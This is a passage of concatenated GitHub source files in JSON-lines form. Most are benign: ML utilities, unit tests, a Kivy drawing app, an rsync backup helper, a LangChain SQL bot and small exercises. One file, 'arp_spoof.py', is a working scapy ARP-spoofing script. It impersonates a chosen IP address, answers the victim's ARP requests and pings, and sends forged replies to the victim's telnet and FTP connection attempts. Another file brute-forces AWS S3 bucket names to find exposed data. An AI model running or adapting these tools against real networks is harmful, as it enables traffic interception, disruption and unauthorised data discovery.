<<<\\n\")\nnearest_neighbours.print_statistics()\n\n#plt.legend()\n#plt.show()\n","repo_name":"pipeherra/MachineLearning","sub_path":"src/prak3/P8.py","file_name":"P8.py","file_ext":"py","file_size_in_byte":4849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9481783143","text":"\"\"\"\nDeuce Valere - Tests - Common - Validation\n\"\"\"\nimport unittest\n\nfrom stoplight import validate\n\nfrom deucevalere.api.system import *\nimport deucevalere.common.validation_instance as v\nfrom deucevalere.tests import *\n\n\nclass TestTimeManagerRule(TestRulesBase):\n\n positive_cases = [\n TimeManager('Monty Python'),\n ]\n\n negative_cases = [\n None, 0, 'K.I.T.T', b'Knight', u'Rider',\n CounterManager('Defender'),\n ListManager('Cole'),\n Manager()\n ]\n\n @validate(value=v.TimeManagerRule)\n def check_time_manager(self, value):\n return True\n\n def test_time_manager_instance(self):\n\n for p_case in TestTimeManagerRule.positive_cases:\n v.val_time_manager()(p_case)\n\n for case in TestTimeManagerRule.negative_cases:\n with self.assertRaises(v.ValidationFailed):\n v.val_time_manager()(case)\n\n def test_time_manager_rule(self):\n\n for p_case in TestTimeManagerRule.positive_cases:\n self.assertTrue(self.check_time_manager(p_case))\n\n for case in TestTimeManagerRule.negative_cases:\n with self.assertRaises(TypeError):\n self.check_time_manager(case)\n\n\nclass TestCounterManagerRule(TestRulesBase):\n\n positive_cases = [\n CounterManager('Black Adder'),\n ]\n\n negative_cases = [\n None, 0, 'Homer', b'Marge', u'Maggie',\n TimeManager('Bart'),\n ListManager('Krusty'),\n Manager()\n ]\n\n @validate(value=v.CounterManagerRule)\n def check_counter_manager(self, value):\n return True\n\n def test_counter_manager_instance(self):\n\n for p_case in TestCounterManagerRule.positive_cases:\n v.val_counter_manager()(p_case)\n\n for case in TestCounterManagerRule.negative_cases:\n with self.assertRaises(v.ValidationFailed):\n v.val_counter_manager()(case)\n\n def test_counter_manager_rule(self):\n\n for p_case in TestCounterManagerRule.positive_cases:\n self.assertTrue(self.check_counter_manager(p_case))\n\n for case in TestCounterManagerRule.negative_cases:\n with self.assertRaises(TypeError):\n self.check_counter_manager(case)\n\n\nclass TestListRuleManager(TestRulesBase):\n\n positive_cases = [\n ListManager('Red Dwarf'),\n ]\n\n negative_cases = [\n None, 0, 'Robin', b'Batman', u'Penguin',\n TimeManager('Joker'),\n CounterManager('Riddler'),\n Manager()\n ]\n\n @validate(value=v.ListManagerRule)\n def check_list_manager(self, value):\n return True\n\n def test_list_manager_instance(self):\n\n for p_case in TestListRuleManager.positive_cases:\n v.val_list_manager()(p_case)\n\n for case in TestListRuleManager.negative_cases:\n with self.assertRaises(v.ValidationFailed):\n v.val_list_manager()(case)\n\n def test_list_manager_rule(self):\n\n for p_case in TestListRuleManager.positive_cases:\n self.assertTrue(self.check_list_manager(p_case))\n\n for case in TestListRuleManager.negative_cases:\n with self.assertRaises(TypeError):\n self.check_list_manager(case)\n\n\nclass TestValereRuleManager(TestRulesBase):\n\n positive_cases = [\n Manager()\n ]\n\n negative_cases = [\n None, 0, 'Dread', b'Pirate', 'Roberts',\n TimeManager('Buttercup'),\n CounterManager('Max'),\n ListManager('Humperdinck')\n ]\n\n @validate(value=v.ValereManagerRule)\n def check_valere_manager(self, value):\n return True\n\n def test_valere_manager_instance(self):\n\n for p_case in TestValereRuleManager.positive_cases:\n v.val_valere_manager()(p_case)\n\n for case in TestValereRuleManager.negative_cases:\n with self.assertRaises(v.ValidationFailed):\n v.val_valere_manager()(case)\n\n def test_valere_manager_rule(self):\n\n for p_case in TestValereRuleManager.positive_cases:\n self.assertTrue(self.check_valere_manager(p_case))\n\n for case in TestValereRuleManager.negative_cases:\n with self.assertRaises(TypeError):\n self.check_valere_manager(case)\n","repo_name":"rackerlabs/deuce-valere","sub_path":"deucevalere/tests/test_validation_instance.py","file_name":"test_validation_instance.py","file_ext":"py","file_size_in_byte":4202,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"36618067451","text":"#!/usr/bin/env python3\nimport multiprocessing\nimport itertools\nimport random, time\nfrom lib.constants import *\nfrom lib.arg_parser import *\nfrom lib.logger import *\nfrom lib.file_actions import *\nfrom lib.progressbar import *\nfrom module.run_bucket import run_bucket\nfrom module.generate_strings import add_prefix_postfix\n\n\ndef string_gen_random(chars, num_chars):\n #Random chars\n while True:\n yield ''.join(random.choice(chars) for i in range(num_chars))\n\n\ndef string_gen_all(chars, num_chars):\n for index, value in enumerate(itertools.product(chars, repeat=num_chars)):\n yield \"\".join(value)\n\n\ndef search_strings():\n global buckets_checked\n\n #String generation check\n if args.all_chars:\n string_generator = string_gen_all(chars=args.characters, num_chars=args.num_chars)\n if args.start_after:\n while True:\n value = string_generator.__next__()\n if value == args.start_after:\n break\n elif args.random_chars:\n string_generator = string_gen_random(chars=args.characters, num_chars=args.num_chars)\n\n progress = ProgressBar(num_items=0)\n\n active_processes = [] #Store the processes until they are done\n pool_size = multiprocessing.cpu_count() * 2\n pool = multiprocessing.Pool(processes=pool_size)\n\n #If you want to also run string generation, do it...otherwise just track results\n while True:\n #If able, add another process (keep plenty in the mix so it's not slow)\n if len(active_processes) < pool_size:\n try:\n next_bucket = string_generator.__next__()\n next_bucket_with_endpoint = \"%s.%s\" % (next_bucket, args.endpoint)\n if not args.rerun and next_bucket_with_endpoint.lower() in buckets_checked:\n progress.num_skipped += 1\n progress(num_completed=0, item=next_bucket)\n if not args.prefix_postfix:\n continue\n else:\n active_processes.append(pool.apply_async(run_bucket, (next_bucket, )))\n progress.num_items += 1\n\n #Add names with prefix/Postfix\n if args.prefix_postfix:\n names_with_prefix_postfix = add_prefix_postfix(next_bucket)\n for name_with_prefix_postfix in names_with_prefix_postfix:\n name_with_prefix_postfix = name_with_prefix_postfix.lower()\n if not args.rerun and \"%s.%s\" % (name_with_prefix_postfix, args.endpoint) in buckets_checked:\n progress.num_skipped += 1\n progress(num_completed=0, item=name_with_prefix_postfix)\n continue \n active_processes.append(pool.apply_async(run_bucket, (name_with_prefix_postfix, )))\n progress.num_items += 1\n\n #Check running processes and remove them when done\n for active_process in active_processes:\n if active_process.ready():\n try:\n buckets_checked.append(\"%s.%s\" % (active_process._value.lower(), args.endpoint))\n add_string_to_file(\"%s/buckets-checked.txt\" % (list_dir), string_to_add=\"%s.%s\" % (active_process._value, args.endpoint)) \n except:\n pass\n active_processes.remove(active_process)\n progress(num_completed=1, item=active_process._value)\n except StopIteration:\n next_bucket = \"\"\n\n #Check running processes and remove them when done\n for active_process in active_processes:\n if active_process.ready():\n buckets_checked.append(\"%s.%s\" % (active_process._value.lower(), args.endpoint))\n add_string_to_file(\"%s/buckets-checked.txt\" % (list_dir), string_to_add=\"%s.%s\" % (active_process._value, args.endpoint))\n active_processes.remove(active_process)\n progress(num_completed=1, item=active_process._value)\n\n\n if not active_processes and not next_bucket:\n break\n\n #DONE!\n progress.done()\n logger.log.critical(\"DONE!\")\n\n\n","repo_name":"Ucnt/aws-s3-data-finder","sub_path":"module/search_strings.py","file_name":"search_strings.py","file_ext":"py","file_size_in_byte":4431,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"52"} +{"seq_id":"70067052325","text":"import Game\nimport Role1 # Import the module for the first role (Wizard)\nimport Role2 # Import the module for the second role (Barbarian)\n\ndef main():\n print(\"Welcome to the Text Adventure Game!\")\n print(\"You find yourself in a mystical realm filled with mystery and danger.\")\n print(\"Two paths lie before you, each leading to a unique destiny.\")\n print(\"Choose your role:\")\n print(\"1. Wizard\")\n print(\"2. Barbarian\")\n\n role_choice = input(\"Enter your choice (1/2): \")\n\n if role_choice == '1':\n player = Role1.initialize_wizard() # Create an instance of the Wizard class\n role_name = \"Wizard\"\n elif role_choice == '2':\n player = Role2.initialize_barbarian() # Create an instance of the Barbarian class\n role_name = \"Barbarian\"\n else:\n print(\"Invalid choice. Exiting the game.\")\n return\n\n print(f\"You are now playing as {role_name}.\")\n print(\"Prepare for an epic adventure!\\n\")\n\n # Start the game\n Game.start_game(player)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Vidhu3110/game","sub_path":"App.py","file_name":"App.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7330636048","text":"#3-1a\nweight = int(input(\"짐의 무게는 얼마입니까? : \"))\nif weight >=10:\n print(\"수수료는 만원 입니다\")\nelse:\n print(\"수수료는 없습니다\")\n\n#3-1b\nweight = int(input(\"짐의 무게는 얼마입니까? : \"))\nif weight >=10:\n print(\"수수료는\",int(weight/10)*10000,\"원 입니다\")\nelse:\n print(\"수수료는 없습니다\")\n\n# 3-2\nimport random\n\nprint('>>숫자 맞추기 게임<<')\ncom = random.randint(1,10) # 1~10 사이 랜덤정수발생\n\nwhile True:\n my = int(input('예상 숫자를 입력하시오 : ')) # 숫자입력\n if my>com :\n print('더 작은수를 입력하세요')\n elif my0:\n s=letter[:abs(i-1)]\n s=s[::-1]\n s=\"-\".join(s)\n if size==1:\n print(f)\n else:\n print((\"{}-{}\".format(f,s)).center((4*n-3),'-'))\n\n for i in range(size-1,0,-1):\n f = letter[:i]\n f1=\"-\".join(f)\n if i >0:\n s = f[:(len(f)-1)]\n s=s[::-1]\n s=\"-\".join(s)\n if size==1:\n print(f1)\n else:\n print((\"{}-{}\".format(f1,s)).center((4*n-3),'-'))\n\n\n\n\n\nif __name__ == '__main__':\n n = int(sys.argv[1])\n print_rangoli(n)\n","repo_name":"mukesh-debug/Python3","sub_path":"alphabetRangoli.py","file_name":"alphabetRangoli.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"6353743537","text":"from invoke import task\nfrom langchain import OpenAI, SQLDatabase, SQLDatabaseChain\nfrom langchain.prompts.prompt import PromptTemplate\n\n\n@task\ndef bot(q, question=\"How many customers order more than 2 times?\"):\n db = SQLDatabase.from_uri(\"clickhouse://default:@localhost/public\",\n include_tables=['customers', 'orders'], # we include only one table to save tokens in the prompt :)\n )\n llm = OpenAI(temperature=0, verbose=True)\n\n _DEFAULT_TEMPLATE = \"\"\"\n Given an input question, first create a syntactically correct {dialect} query to run, then look at the results of the query and return the answer.\n Use the following format:\n\n Question: \"Question here\"\n SQLQuery: \"SQL Query to run\"\n SQLResult: \"Result of the SQLQuery\"\n Answer: \"Final answer here\"\n\n Only use the following tables:\n\n {table_info}\n\n Question: {input}\n \"\"\"\n\n PROMPT = PromptTemplate(\n input_variables=[\"input\", \"table_info\", \"dialect\"], template=_DEFAULT_TEMPLATE\n )\n\n db_chain = SQLDatabaseChain.from_llm(llm, db, prompt=PROMPT, verbose=True, use_query_checker=True, return_intermediate_steps=True)\n result = db_chain(question)\n","repo_name":"LaDataEsCool/esqlito","sub_path":"tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"2837499277","text":"from scapy.all import *\n\nspoofedIP = \"192.168.22.200\"\nvictim = \"192.168.22.9\"\nMaliciousICMPseq = 2212\nMaliciousICMPdata = 'ping malicieux'\n\nprint('Identification adresse MAC locale')\npacket = Ether(dst='ff:ff:ff:ff:ff:ff')/IP(dst=spoofedIP)\nMyMac = packet[Ether].src\n\nprint('Préparation de l\\'attaque')\npacket = Ether(src=MyMac, dst=\"ff:ff:ff:ff:ff:ff\")/ARP(hwlen=6,plen=4,op=1,hwsrc=MyMac,psrc=spoofedIP,pdst=victim)\nanswer = srp1(packet, timeout=1, verbose=False)\n\nif answer is None :\n\tprint(\"Check : %s is down or unused.\" + victim)\n\tsys.exit()\nMacVictim = answer.src\nprint('ARP:'+ victim,'indentifiée -'+ MacVictim)\n\npacket = Ether(src=MyMac, dst=MacVictim)/IP(src=spoofedIP, dst=victim)/ICMP(type=8,code=0,id=0,seq=MaliciousICMPseq)/MaliciousICMPdata\nanswer = srp1(packet, timeout=1, verbose=False)\n\nif answer is None :\n\tprint('ICMP : pas de réponse de'+ victim)\n\tsys.exit()\nif answer.haslayer(ICMP) is True and answer[IP].src == victim and answer[IP].dst == spoofedIP and answer[ICMP].type == 0 and answer[ICMP].seq == MaliciousICMPseq:\n\tprint('ICMP : Succes !')\nelse:\n\tprint('ICMP : réponse incorrecte de'+victim)\n\tsys.exit()\n\nprint(\"Attaque ARP Spoofing en cours .\")\nprint(\"Attaque ARP Spoofing en cours ..\")\nprint(\"Attaque ARP Spoofing en cours ...\")\n\ndef PacketHandler(p):\n\tif p.haslayer(ARP) is True:\n\t\tif p[ARP].op == 1 and p[ARP].psrc == victim and p[ARP].pdst == spoofedIP:\n\t\t\t#Requete ARP à laquelle il faut rep\n\t\t\tprint('A', end='.',flush=True)\n\t\t\ta = Ether(src=MyMac, dst=p[ARP].hwsrc)/ARP(hwlen=p[ARP].hwlen, plen=p[ARP].plen, op=2, hwsrc=MyMac, psrc=spoofedIP, hwdst=p[ARP].hwsrc, pdst=p[ARP].psrc)\n\t\t\tsendp(a, verbose=False)\n\tif p.haslayer(ICMP) is True:\n\t\tif p[IP].src == victim and p[IP].dst == spoofedIP and p[ICMP].type == 8:\n\t\t\t#Requete ICMP Echo à lequelle il faut rep\n\t\t\tprint('I', end='.',flush=True)\n\t\t\ta =Ether(src=MyMac, dst=MacVictim)/IP(src=spoofedIP, dst=victim)/ICMP(type=0,id=p[ICMP].id, seq=p[ICMP].seq)/p[Raw].load\n\t\t\tsendp(a, verbose=False)\n\n\tif p.haslayer(TCP) is True:\n\t\tif p[IP].src == victim and p[IP].dst == spoofedIP and p[TCP].flags == 2 and (p[TCP].dport == 23 or p[TCP].dport == 21):\n\t\t\ta = Ether(src=MyMac, dst=MacVictim)/IP (src=spoofedIP, dst=victim)/TCP(sport=p[TCP].dport, dport= p[TCP].sport, ack=p[TCP].seq+1, flags=20, window=p[TCP].window)\n\t\t\tsendp(a,verbose=False)\n\nbpf = \"ether src \" + MacVictim\nsniff(filter=bpf, prn=PacketHandler)\nprint(\"Bye !\")\n","repo_name":"Wylow0/Scappy","sub_path":"arp_spoof.py","file_name":"arp_spoof.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41621938193","text":"from torch.utils.data import DataLoader, random_split, Dataset\r\nfrom torchvision import datasets, transforms\r\nimport torchvision.transforms as transforms\r\n# from PIL import Image\r\n# import os\r\n\r\n# def png_RGBA():\r\n# folder_path_list = [\"Data/mask\", \"Data/no_mask\"]\r\n# for folder_path in folder_path_list:\r\n# png_files = [f for f in os.listdir(folder_path) if f.endswith(\".png\")]\r\n# for png_file in png_files:\r\n# image = Image.open(os.path.join(folder_path, png_file))\r\n# if image.mode != \"RGBA\":\r\n# image = image.convert(\"RGBA\")\r\n# image.save(os.path.join(folder_path, png_file))\r\n\r\nclass TrainDataset(Dataset):\r\n def __init__(self, train, transform=None):\r\n self.train = train\r\n self.transform = transform\r\n \r\n def __getitem__(self, index):\r\n x, y = self.train[index]\r\n if self.transform:\r\n x = self.transform(x)\r\n return x, y\r\n \r\n def __len__(self):\r\n return len(self.train)\r\n\r\nclass TestDataset(Dataset):\r\n def __init__(self, test, transform=None):\r\n self.test = test\r\n self.transform = transform\r\n \r\n def __getitem__(self, index):\r\n x, y = self.test[index]\r\n if self.transform:\r\n x = self.transform(x)\r\n return x, y\r\n \r\n def __len__(self):\r\n return len(self.test)\r\n \r\ndef create_datasets(file_path):\r\n \r\n dataset = datasets.ImageFolder(root=file_path, \r\n transform=None\r\n )\r\n return dataset\r\n\r\ndef split_datasets(dataset):\r\n\r\n train_ratio, val_ratio = [0.7, 0.15]\r\n\r\n dataset_size = len(dataset)\r\n train_size = int(dataset_size * train_ratio)\r\n val_size = int(dataset_size * val_ratio)\r\n test_size = dataset_size - train_size - val_size\r\n train_dataset, validation_dataset, test_dataset = random_split(dataset, [train_size, val_size, test_size])\r\n\r\n return train_dataset, validation_dataset, test_dataset\r\n\r\ndef augmentation_datasets(train_data, val_data, test_data):\r\n\r\n train_transform=transforms.Compose([\r\n transforms.Resize((48, 48)),\r\n transforms.RandomHorizontalFlip(),\r\n transforms.RandomRotation(10),\r\n transforms.RandomGrayscale(p=0.1),\r\n transforms.RandomAdjustSharpness(sharpness_factor=2.0),\r\n\r\n transforms.ToTensor(),\r\n transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225))\r\n ])\r\n \r\n test_transform=transforms.Compose([\r\n transforms.Resize((48, 48)),\r\n transforms.ToTensor(),\r\n transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225))\r\n ])\r\n\r\n return TrainDataset(train_data, train_transform), TestDataset(val_data, test_transform), TestDataset(test_data, test_transform)\r\n\r\ndef data_load(train_dataset, validation_dataset, test_dataset, batch_size=0):\r\n \r\n if batch_size == 0:\r\n train_loader = DataLoader(train_dataset, \r\n shuffle=True, \r\n num_workers=0\r\n )\r\n\r\n val_loader = DataLoader(validation_dataset, \r\n shuffle=True, \r\n num_workers=0\r\n )\r\n\r\n test_loader = DataLoader(test_dataset, \r\n shuffle=False, \r\n num_workers=0\r\n )\r\n else:\r\n train_loader = DataLoader(train_dataset, \r\n batch_size=batch_size,\r\n shuffle=True, \r\n num_workers=0\r\n )\r\n\r\n val_loader = DataLoader(validation_dataset, \r\n batch_size=batch_size,\r\n shuffle=True, \r\n num_workers=0\r\n )\r\n\r\n test_loader = DataLoader(test_dataset, \r\n batch_size=batch_size,\r\n shuffle=False, \r\n num_workers=0\r\n )\r\n \r\n return train_loader, val_loader, test_loader","repo_name":"sumin303/23_2_AI_Midterm","sub_path":"DataLoad.py","file_name":"DataLoad.py","file_ext":"py","file_size_in_byte":4238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72545308326","text":"\"\"\"\n\nHelper functions for rsync backup script. Requires python 3.5 or higher\n due to subprocess.run, and rsync 3.x.x or higher.\n\nTom Wallis\n\n\"\"\"\n\nimport os, subprocess\nfrom itertools import product\n\n\ndef check_location_exists(path, file_type):\n \"\"\"\n :param path: absolute path to directory / file you want to check\n :param file_type: string: 'source' or 'dest'.\n :return: prints status to command line\n \"\"\"\n\n if file_type != 'source' and file_type != 'dest':\n raise ValueError('Specify source or dest type')\n\n if os.path.exists(path):\n valid = True\n print('Found {} location {}'.format(file_type, path))\n else:\n valid = False\n print('Couldn\\'t find {} location {} !!'.format(file_type, path))\n\n return valid\n\n\ndef ensure_dir(d):\n if not os.path.exists(d):\n os.makedirs(d)\n\n\ndef valid_locations(path_list, file_type):\n \"\"\"\n Return valid source / dest locations\n :param path_list: list of paths to be checked.\n :param file_type: 'source' or 'dest'\n :return: a list containing valid paths\n \"\"\"\n\n valid_list = []\n for path in path_list:\n status = check_location_exists(path, file_type)\n if status:\n valid_list.append(path)\n\n # summarise valid paths in console:\n print('Found {} valid {}s'.format(len(valid_list), file_type))\n\n return valid_list\n\n\ndef backup(source, dest):\n \"\"\"\n The main backup function, using rsync. I use the following rsync options:\n\n -a = archive mode. Do recursive backup, preserving links and permissions\n -H = preserve hard-linked files.\n -X = preserve extended attributes. Requires rsync v 3.x.x\n (update via homebrew if required).\n -A = preserve acls (\n -h = human-readable numbers.\n -vv = double verbosity of output.\n --no-whole-file = ensure that delta (incremental) update is used even for\n local transfers.\n --delete = delete extraeneous files from the destination directory.\n old files in the library won't be kept on the backup.\n\n :param source: full path to source\n :param dest: full path to dest\n :return:\n \"\"\"\n\n # source = source + '/' # add trailing slash to not duplicate parent dir.\n\n # do a dry run, have user confirm:\n print('\\nDry-run of backup {} to {} ...'.format(source, dest))\n subprocess.run('rsync -aHXAhvv --no-whole-file --delete --dry-run {} {}'.\n format(source, dest), shell=True)\n\n answer = []\n while answer != 'y' and answer != 'n':\n answer = input('Do you want to proceed with real backup? [y / n]')\n\n if answer == 'y':\n print('\\nBacking up {} to {} ...'.format(source, dest))\n subprocess.run('rsync -aHXAhvv --no-whole-file --delete {} {}'.\n format(source, dest), shell=True)\n else:\n print('\\nYou decided not to proceed!')\n\n\ndef backup_loop(valid_sources, valid_dests):\n for dest, source in product(valid_dests, valid_sources):\n backup(source, dest)\n\n\n","repo_name":"tomwallis/rsync_pyutils","sub_path":"funs.py","file_name":"funs.py","file_ext":"py","file_size_in_byte":2999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2372928296","text":"from kivy.app import App\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.button import Button\nfrom kivy.uix.widget import Widget\nfrom kivy.graphics import Color, Line, Ellipse\nimport math\n\ndef euclidean_distance(point1, point2):\n \"\"\"\n Calculates the Euclidean distance between two points in two-dimensional space.\n The points should be given as tuples or lists of two numbers, representing the\n x and y coordinates of each point.\n \"\"\"\n dx = point2[0] - point1[0]\n dy = point2[1] - point1[1]\n return math.sqrt(dx*dx + dy*dy)\n\nclass MainWidget(BoxLayout):\n def __init__(self, **kwargs):\n super(MainWidget, self).__init__(**kwargs)\n\n # Create the left column of buttons\n left_col = BoxLayout(orientation='vertical')\n target_zone_button = Button(text='Target Zone',\n on_press=self.activate_target_zone_widget)\n pen_button = Button(text='Pen', on_press=self.activate_pen_widget)\n left_col.add_widget(target_zone_button)\n left_col.add_widget(pen_button)\n self.add_widget(left_col)\n\n # Create the top row of buttons\n top_row = BoxLayout(orientation='horizontal')\n red_button = Button(text='Red', on_press=self.set_color_red)\n blue_button = Button(text='Blue', on_press=self.set_color_blue)\n green_button = Button(text='Green', on_press=self.set_color_green)\n yellow_button = Button(text='Yellow', on_press=self.set_color_yellow)\n top_row.add_widget(red_button)\n top_row.add_widget(blue_button)\n top_row.add_widget(green_button)\n top_row.add_widget(yellow_button)\n self.add_widget(top_row)\n\n # create the canvas widget\n self.canvas_widget = Widget()\n self.add_widget(self.canvas_widget)\n\n # set the initial color to be red\n self.color = Color(1, 0, 0, 1)\n\n # set the initial active widget to be the circle widget\n self.active_widgets = []\n\n # set the initial active widget to be None\n self.active_widget = None\n self.active_widgets = []\n\n def set_color(self, r, g, b, a):\n self.color = (r, g, b, a)\n\n def set_color_red(self, instance):\n for widget in self.active_widgets:\n widget.color = [1, 0, 0, 1]\n\n def set_color_blue(self, instance):\n for widget in self.active_widgets:\n widget.color = [0, 0, 1, 1]\n\n def set_color_green(self, instance):\n for widget in self.active_widgets:\n widget.color = [0, 1, 0, 1]\n\n def set_color_yellow(self, instance):\n for widget in self.active_widgets:\n widget.color = [1, 1, 0, 1]\n\n def activate_target_zone_widget(self, instance):\n if isinstance(self.active_widget, TargetZone):\n # do nothing if the active widget is already a target zone\n return\n elif self.active_widget is not None and not isinstance(self.active_widget, TargetZone):\n # remove the active widget if it is not a pen\n self.canvas_widget.remove_widget(self.active_widget)\n target_zone = TargetZone(color=self.color)\n self.active_widget = target_zone\n self.active_widgets.append(target_zone)\n self.canvas_widget.add_widget(target_zone)\n\n def activate_pen_widget(self, instance):\n if isinstance(self.active_widget, Pen):\n # do nothing if the active widget is already a pen\n return\n elif self.active_widgets and not isinstance(self.active_widget, Pen):\n # remove the active widget if it is not a pen or target zone\n self.canvas_widget.remove_widget(self.active_widget)\n pen = Pen(color=self.color)\n self.active_widget = pen\n self.active_widgets.append(pen)\n self.canvas_widget.add_widget(pen)\n\n\nclass TargetZone(Widget):\n def __init__(self, color, **kwargs):\n super().__init__(**kwargs)\n self.color = [1, 1, 1, 1]\n self.bind(pos=self.update_circle, size=self.update_circle)\n\n def on_touch_down(self, touch):\n with self.canvas:\n Color(*self.color)\n touch.ud['circle'] = Ellipse(pos=(touch.x, touch.y), size=(1, 1))\n touch.ud['center'] = (touch.x, touch.y)\n\n def on_touch_move(self, touch):\n circle = touch.ud['circle']\n center = touch.ud['center']\n radius = euclidean_distance((touch.x, touch.y), center)\n circle.pos = (center[0] - radius, center[1] - radius)\n circle.size = (radius*2, radius*2)\n\n def update_circle(self, *args):\n self.circle.pos = self.pos\n self.circle.size = self.size\n self.canvas.clear()\n with self.canvas:\n Color(*self.color)\n self.circle = Ellipse(pos=self.pos, size=self.size)\n\nclass Pen(Widget):\n def __init__(self, color, **kwargs):\n super().__init__(**kwargs)\n self.color = [1, 1, 1, 1]\n\n def on_touch_down(self, touch):\n with self.canvas:\n Color(*self.color)\n touch.ud['line'] = Line(points=(touch.x, touch.y), width=2, color=self.color)\n\n def on_touch_move(self, touch):\n touch.ud['line'].points += [touch.x, touch.y]\n\n def on_touch_up(self, touch):\n pass\n\nclass MyApp(App):\n def build(self):\n return MainWidget()\n\n\nif __name__ == '__main__':\n MyApp().run()\n","repo_name":"BocceLabs/bat_experimental","sub_path":"02_gui_with_target_and_pen.py","file_name":"02_gui_with_target_and_pen.py","file_ext":"py","file_size_in_byte":5357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38989582119","text":"# Cálculo do IMC\n# IMC = Peso ÷ (Altura × Altura)\n# IMC = 80 kg ÷ (1,80 m × 1,80 m) = 24,69 kg/m2 (Peso ideal)\n\nnome = 'Marcos Souza'\naltura = 1.80\npeso = 95\nimc = ... # placeholder como um código que não foi escrito. Posso usar para escrever o código depois \nimc = peso / altura ** 2\n\nprint(nome, 'tem', altura, 'de altura,',)\nprint('pesa', peso, 'quilos e seu imc é',)\nprint(imc)\n","repo_name":"MarcosSouzaa/python","sub_path":"aula12.py","file_name":"aula12.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"41142787420","text":"import os\n\nimport torch\nimport numpy as np\n\nfrom sklearn.ensemble import RandomForestClassifier\nfrom torch_geometric.nn import global_add_pool\nfrom torch_geometric.data import DataLoader\n\nfrom MotiFiesta.utils.learning_utils import load_model\nfrom MotiFiesta.src.loading import get_loader\n\nclass Classifier:\n def __init__(self):\n pass\n def decode():\n raise NotImplementedError\n def train():\n raise NotImplementedError\n def eval():\n raise NotImplementedError\n\n def eval_kfold(self, dataset, inds_path, n_splits=10):\n accs = []\n for split in range(1, n_splits+1):\n with open(os.path.join(inds_path, f\"test_idx-{split}.txt\"), 'r') as s:\n test_inds = [int(i) for i in s.readlines()]\n with open(os.path.join(inds_path, f\"train_idx-{split}.txt\"), 'r') as s:\n train_inds = [int(i) for i in s.readlines()]\n\n test_data = DataLoader([dataset[i] for i in test_inds])\n train_data = DataLoader([dataset[i] for i in train_inds])\n self.train(train_data)\n accs.append(self.eval(test_data))\n\n return np.mean(accs), np.std(accs)\n\nclass MotiFiestaClassifierSK(Classifier):\n def __init__(self,\n encoder,\n decoder='RF',\n sigma_filter='all',\n sigma_k=3,\n largest=True,\n layers=3,\n dummy=False):\n self.encoder = load_model(encoder)['model']\n self.layers = layers\n self.dummy = dummy\n \n self.sigma_k = sigma_k\n self.largest = largest\n\n self.keep_all = False\n self.sigma_filter = sigma_filter\n if sigma_filter == 'all':\n self.keep_all = True\n\n if decoder == 'RF':\n self.classifier = RandomForestClassifier()\n super(MotiFiestaClassifierSK).__init__()\n\n def decode(self, loader):\n X = []\n y = []\n skipped_idx = set()\n for i, g in enumerate(loader):\n g = g['pos']\n with torch.no_grad():\n embs,sigmas,ee,_,merge_info,_ = self.encoder(g.x,\n g.edge_index,\n g.batch,\n dummy=self.dummy\n )\n tree = merge_info['tree']\n if len(embs) < self.layers:\n skipped_idx.add(i)\n continue\n x_layers = []\n for l in range(1, self.layers):\n if not self.keep_all:\n X_l = embs[l]\n S_l = torch.tensor([self.total_sigma(l, i, tree, sigmas, ee) for i in range(X_l.shape[0])], dtype=torch.float32)\n if self.sigma_filter == 'topk':\n X_l = self.sigma_filter_topk(X_l, S_l, k=self.sigma_k, largest=self.largest)\n if self.sigma_filter == 'random':\n X_l = self.sigma_filter_randomk(X_l, self.sigma_k)\n else:\n X_l = embs[l]\n b = torch.zeros(len(X_l), dtype=torch.long)\n h = global_add_pool(X_l, b)\n x_layers.append(h)\n x_glob = torch.cat(x_layers, dim=1).squeeze()\n X.append(x_glob.squeeze())\n y.append(g.y)\n X = torch.stack(X)\n y = torch.stack(y)\n return X.detach().numpy(), y.detach().numpy()\n\n def train(self, train_loader):\n X, y = self.decode(train_loader)\n self.classifier.fit(X, y)\n\n def eval(self, test_loader):\n X_test, y_test = self.decode(test_loader)\n return self.classifier.score(X_test, y_test)\n\n @staticmethod\n def sigma_filter_topk(X, S, k, largest=True):\n _, keep_inds = torch.topk(S, min(k, X.shape[0]), largest=largest)\n return X[keep_inds]\n\n @staticmethod\n def sigma_filter_randomk(X, k):\n keep_inds = torch.sort(torch.randperm(X.size(0))[:k])[0]\n return X[keep_inds]\n\n @staticmethod\n def total_sigma(level, node, tree, sigmas, ee):\n \"\"\" Recursively compute total sigma score\n for a subgraph.\n \"\"\"\n children = list(tree[level][node])\n n_children = len(children)\n\n if n_children == 0:\n return 0\n elif n_children == 1:\n return MotiFiestaClassifierSK.total_sigma(level-1, children[0], tree, sigmas, ee)\n else:\n eind = (ee[level-1][0] == children[0]) &\\\n (ee[level-1][1] == children[1])\n eind = eind.nonzero()[0][0].item()\n score = sigmas[level-1][eind]\n # get score for this node\n return score +\\\n MotiFiestaClassifierSK.total_sigma(level-1, children[0], tree, sigmas, ee) +\\\n MotiFiestaClassifierSK.total_sigma(level-1, children[1], tree, sigmas, ee)\n\n\n\n\n\nclass MotiFiestaClassifierFineTune:\n def __init__(self):\n 